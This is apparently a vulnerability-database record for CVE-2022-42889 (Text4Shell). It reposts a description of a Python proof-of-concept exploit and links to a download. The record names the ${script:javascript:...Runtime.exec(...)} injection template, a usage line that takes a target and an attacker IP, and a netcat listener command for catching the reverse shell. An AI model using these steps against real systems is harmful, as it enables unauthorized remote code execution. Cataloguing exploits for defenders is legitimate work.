{"uuid": "88015ff6-f523-434c-96d3-ad8a7fea4107", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/4444", "content": "A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability (https://www.kitploit.com/search/label/Vulnerability) in Apache Commons Text versions < 1.10. This exploit targets vulnerable (https://www.kitploit.com/search/label/Vulnerable) Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection (https://www.kitploit.com/search/label/Injection) of ${script:...} expressions to execute arbitrary system commands. In this PoC, exploitation is demonstrated via the data query parameter (https://www.kitploit.com/search/label/Parameter); however, the vulnerable parameter (https://www.kitploit.com/search/label/Parameter) name may vary depending on the implementation. Users should adapt the payload (https://www.kitploit.com/search/label/Payload) and request path accordingly based on the target application's logic. Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.\n Description This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor. Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...} interpolation from untrusted input Usage python3 text4shell.py \n Example python3 text4shell.py 127.0.0.1 192.168.1.2 4444\n Make sure to set up a lsitener on your attacking machine: nc -nlvp 4444\n Payload Logic The script injects: ${script:javascript:java.lang.Runtime.getRuntime().exec(...)}\n The reverse shell is sent via /data parameter using a POST request.\n\nDownload Text4Shell-Exploit (https://github.com/chaudharyarjun/text4shell-exploit)", "creation_timestamp": "2025-04-23T13:36:36.000000Z"}